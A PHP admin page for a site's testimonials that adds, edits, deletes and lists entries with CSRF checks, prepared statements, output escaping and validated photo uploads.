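<?php
/*
 * Admin page: manage testimonials (add / edit / delete, plus the listing).
 *
 * Every state change (including delete) is a POST carrying the session CSRF
 * token. Photo uploads are checked for PHP upload status, extension, size and
 * real MIME type, and are stored under a server-generated name, so no
 * client-supplied string ever reaches the filesystem path or the HTML unescaped.
 */
include 'secure_session.php';   // 🔐 Always first (session security)
include 'includes/auth.php';    // ✅ Your authentication check
require_once '../config.php';   // ✅ DB connection (provides mysqli $conn)
include 'includes/header.php';  // ✅ Layout header

$success = $error = "";
$allowedTypes = ['jpg', 'jpeg', 'png', 'gif'];
$maxSize = 2 * 1024 * 1024; // 2MB
$uploadDir = __DIR__ . "/../uploads/testimonials/";
// NOTE: the web server should also be configured not to execute scripts under
// uploads/; the checks in store_testimonial_photo() reject renamed scripts, but
// a no-exec rule on that directory is a cheap second line of defence.

// Rating options as rendered in both forms, highest first.
$ratingLabels = [
    5 => "⭐⭐⭐⭐⭐ (5)",
    4 => "⭐⭐⭐⭐ (4)",
    3 => "⭐⭐⭐ (3)",
    2 => "⭐⭐ (2)",
    1 => "⭐ (1)",
];

/**
 * HTML-escape a value for output in a text node or an attribute (either quote style).
 */
function esc($value): string
{
    return htmlspecialchars((string)$value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Read a POST field as a trimmed string; '' when absent or not a string
 * (e.g. a `name[]` array submitted to confuse the handler).
 */
function post_string(string $key): string
{
    $value = $_POST[$key] ?? '';
    return is_string($value) ? trim($value) : '';
}

/**
 * Abort the request with 403 unless $token is a string equal to the session CSRF token.
 */
function require_csrf($token): void
{
    if (!is_string($token) || !hash_equals((string)$_SESSION['csrf'], $token)) {
        http_response_code(403);
        die("❌ CSRF validation failed.");
    }
}

/**
 * Clamp a submitted rating to the 1..5 range the form offers, so a tampered
 * value can never store 0 or 99 stars.
 */
function clamp_rating($value): int
{
    return max(1, min(5, (int)$value));
}

/**
 * Validate and store one uploaded photo.
 *
 * Checks the PHP upload status, the extension allow-list, the size cap and the
 * real MIME type (finfo) so that a renamed script is not accepted as an image.
 * The stored name is server-generated; the client's file name is never used.
 *
 * @param array<string,mixed> $file    one entry of $_FILES
 * @param string              $dir     target directory, with trailing slash
 * @param list<string>        $allowed allowed lowercase extensions
 * @param int                 $maxSize maximum size in bytes
 * @return array{0:string,1:string} [storedFileName, errorMessage] — exactly one is non-empty
 */
function store_testimonial_photo(array $file, string $dir, array $allowed, int $maxSize): array
{
    $status = (int)($file['error'] ?? UPLOAD_ERR_NO_FILE);
    if ($status !== UPLOAD_ERR_OK) {
        return ['', "❌ Upload failed (error code {$status})."];
    }
    // mkdir can lose a race with a concurrent request; re-check is_dir after it.
    if (!is_dir($dir) && !mkdir($dir, 0755, true) && !is_dir($dir)) {
        return ['', "❌ Could not create upload directory."];
    }
    $ext = strtolower(pathinfo((string)$file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        return ['', "❌ Only JPG, PNG, GIF allowed."];
    }
    if ((int)$file['size'] > $maxSize) {
        return ['', "❌ File too large (max 2MB)."];
    }
    // The extension is client-controlled; confirm the bytes really are an image.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file((string)$file['tmp_name']);
    if (!in_array($mime, ['image/jpeg', 'image/png', 'image/gif'], true)) {
        return ['', "❌ File is not a valid image."];
    }
    $safeName = time() . "_" . bin2hex(random_bytes(5)) . "." . $ext;
    if (!move_uploaded_file((string)$file['tmp_name'], $dir . $safeName)) {
        // Previously this failure was silent and the record was saved without a photo.
        return ['', "❌ Could not save uploaded file."];
    }
    return [$safeName, ''];
}

/**
 * Remove a stored photo if it exists. basename() strips any directory
 * component, so a value read back from the database cannot escape $dir.
 */
function delete_testimonial_photo(string $dir, ?string $fileName): void
{
    if ($fileName === null || $fileName === '') {
        return;
    }
    $path = $dir . basename($fileName);
    if (is_file($path)) {
        unlink($path);
    }
}

/**
 * Return the stored photo name for a testimonial id, or null when the row
 * does not exist or has no photo.
 */
function fetch_testimonial_photo(mysqli $conn, int $id): ?string
{
    $stmt = $conn->prepare("SELECT photo FROM testimonials WHERE id=?");
    $stmt->bind_param("i", $id);
    $stmt->execute();
    $stmt->bind_result($file);
    $found = $stmt->fetch();
    $stmt->close();

    return ($found && $file !== null && $file !== '') ? (string)$file : null;
}

// ✅ CSRF Token
if (empty($_SESSION['csrf'])) {
    $_SESSION['csrf'] = bin2hex(random_bytes(32));
}
$csrf = (string)$_SESSION['csrf'];
$isPost = ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST';

// ✅ Add Testimonial
if ($isPost && isset($_POST['add_testimonial'])) {
    require_csrf($_POST['csrf'] ?? null);
    $name    = post_string('name');
    $role    = post_string('role');
    $message = post_string('message');
    $rating  = clamp_rating($_POST['rating'] ?? 5);
    $photo   = '';

    if ($name === '' || $message === '') {
        // The form marks these `required`, but the server must not trust that.
        $error = "❌ Name and message are required.";
    } elseif (!empty($_FILES['photo']['name'])) {
        [$photo, $error] = store_testimonial_photo($_FILES['photo'], $uploadDir, $allowedTypes, $maxSize);
    }

    if ($error === '') {
        $stmt = $conn->prepare("INSERT INTO testimonials (name, role, message, photo, rating) VALUES (?,?,?,?,?)");
        $stmt->bind_param("ssssi", $name, $role, $message, $photo, $rating);
        $stmt->execute();
        $stmt->close();
        $success = "✅ Testimonial added successfully.";
    }
}

// ✅ Delete Testimonial — POST only: a GET link put the CSRF token in the URL
// (Referer/log leakage) and let a state change be triggered by a plain link.
if ($isPost && isset($_POST['delete_testimonial'])) {
    require_csrf($_POST['csrf'] ?? null);
    $id = (int)($_POST['id'] ?? 0);

    delete_testimonial_photo($uploadDir, fetch_testimonial_photo($conn, $id));

    $stmt = $conn->prepare("DELETE FROM testimonials WHERE id=?");
    $stmt->bind_param("i", $id);
    $stmt->execute();
    $stmt->close();
    $success = "⚠️ Testimonial deleted.";
}

// ✅ Edit Testimonial
if ($isPost && isset($_POST['edit_testimonial'])) {
    require_csrf($_POST['csrf'] ?? null);
    $id      = (int)($_POST['id'] ?? 0);
    $name    = post_string('name');
    $role    = post_string('role');
    $message = post_string('message');
    $rating  = clamp_rating($_POST['rating'] ?? 5);
    $photo   = '';

    if ($name === '' || $message === '') {
        $error = "❌ Name and message are required.";
    } elseif (!empty($_FILES['photo']['name'])) {
        [$photo, $error] = store_testimonial_photo($_FILES['photo'], $uploadDir, $allowedTypes, $maxSize);
        if ($photo !== '') {
            // Only drop the old photo once the replacement is safely on disk.
            delete_testimonial_photo($uploadDir, fetch_testimonial_photo($conn, $id));
        }
    }

    if ($error === '') {
        if ($photo !== '') {
            $stmt = $conn->prepare("UPDATE testimonials SET name=?, role=?, message=?, photo=?, rating=? WHERE id=?");
            $stmt->bind_param("ssssii", $name, $role, $message, $photo, $rating, $id);
        } else {
            // No new upload: keep whatever photo the row already has.
            $stmt = $conn->prepare("UPDATE testimonials SET name=?, role=?, message=?, rating=? WHERE id=?");
            $stmt->bind_param("sssii", $name, $role, $message, $rating, $id);
        }
        $stmt->execute();
        $stmt->close();
        $success = "✅ Testimonial updated successfully.";
    }
}
?>
<div class="container mt-4">
    <h3 class="mb-4">📢 Manage Testimonials</h3>
    <?php if ($success): ?><div class="alert alert-success"><?= esc($success) ?></div><?php endif; ?>
    <?php if ($error): ?><div class="alert alert-danger"><?= esc($error) ?></div><?php endif; ?>

    <!-- Add Testimonial Form -->
    <div class="card mb-4">
        <div class="card-header">➕ Add Testimonial</div>
        <div class="card-body">
            <form method="POST" enctype="multipart/form-data">
                <input type="hidden" name="csrf" value="<?= esc($csrf) ?>">
                <div class="form-group"><label>Name</label><input type="text" name="name" class="form-control" required></div>
                <div class="form-group"><label>Role / Course</label><input type="text" name="role" class="form-control"></div>
                <div class="form-group"><label>Message</label><textarea name="message" class="form-control" required></textarea></div>
                <div class="form-group"><label>Rating</label>
                    <select name="rating" class="form-control" required>
                        <?php foreach ($ratingLabels as $value => $label): ?>
                        <option value="<?= $value ?>"<?= $value === 5 ? ' selected' : '' ?>><?= $label ?></option>
                        <?php endforeach; ?>
                    </select>
                </div>
                <div class="form-group"><label>Photo (optional)</label><input type="file" name="photo" accept="image/*" class="form-control"></div>
                <button type="submit" name="add_testimonial" class="btn btn-primary">Add</button>
            </form>
        </div>
    </div>

    <!-- Testimonial List -->
    <div class="table-responsive">
        <table class="table table-bordered table-hover text-center">
            <thead class="thead-dark">
                <tr><th>ID</th><th>Name</th><th>Role</th><th>Message</th><th>Rating</th><th>Photo</th><th>Actions</th></tr>
            </thead>
            <tbody>
            <?php $res = $conn->query("SELECT * FROM testimonials ORDER BY id DESC"); ?>
            <?php if ($res && $res->num_rows > 0): ?>
                <?php while ($row = $res->fetch_assoc()): ?>
                <?php $id = (int)$row['id']; $rowRating = (int)$row['rating']; ?>
                <tr>
                    <td><?= $id ?></td>
                    <td><?= esc($row['name']) ?></td>
                    <td><?= esc($row['role']) ?></td>
                    <td><?= esc($row['message']) ?></td>
                    <td><?= str_repeat("⭐", max(0, $rowRating)) ?></td>
                    <td><?php if ($row['photo']): ?><img src="../uploads/testimonials/<?= esc(basename((string)$row['photo'])) ?>" width="60"><?php else: ?>—<?php endif; ?></td>
                    <td>
                        <form method="POST" enctype="multipart/form-data" style="display:inline-block; width:200px;">
                            <input type="hidden" name="csrf" value="<?= esc($csrf) ?>">
                            <input type="hidden" name="id" value="<?= $id ?>">
                            <input type="text" name="name" value="<?= esc($row['name']) ?>" class="form-control mb-1" required>
                            <input type="text" name="role" value="<?= esc($row['role']) ?>" class="form-control mb-1">
                            <textarea name="message" class="form-control mb-1"><?= esc($row['message']) ?></textarea>
                            <select name="rating" class="form-control mb-1">
                                <?php foreach ($ratingLabels as $value => $label): ?>
                                <option value="<?= $value ?>"<?= $value === $rowRating ? ' selected' : '' ?>><?= $label ?></option>
                                <?php endforeach; ?>
                            </select>
                            <input type="file" name="photo" accept="image/*" class="form-control mb-1">
                            <button type="submit" name="edit_testimonial" class="btn btn-warning btn-sm btn-block">Edit</button>
                        </form>
                        <form method="POST" style="display:inline-block;" onsubmit="return confirm('Delete this testimonial?')">
                            <input type="hidden" name="csrf" value="<?= esc($csrf) ?>">
                            <input type="hidden" name="id" value="<?= $id ?>">
                            <button type="submit" name="delete_testimonial" class="btn btn-danger btn-sm">Delete</button>
                        </form>
                    </td>
                </tr>
                <?php endwhile; ?>
            <?php else: ?>
                <tr><td colspan="7">No Testimonials Found</td></tr>
            <?php endif; ?>
            </tbody>
        </table>
    </div>
</div>
<?php include 'includes/footer.php'; ?>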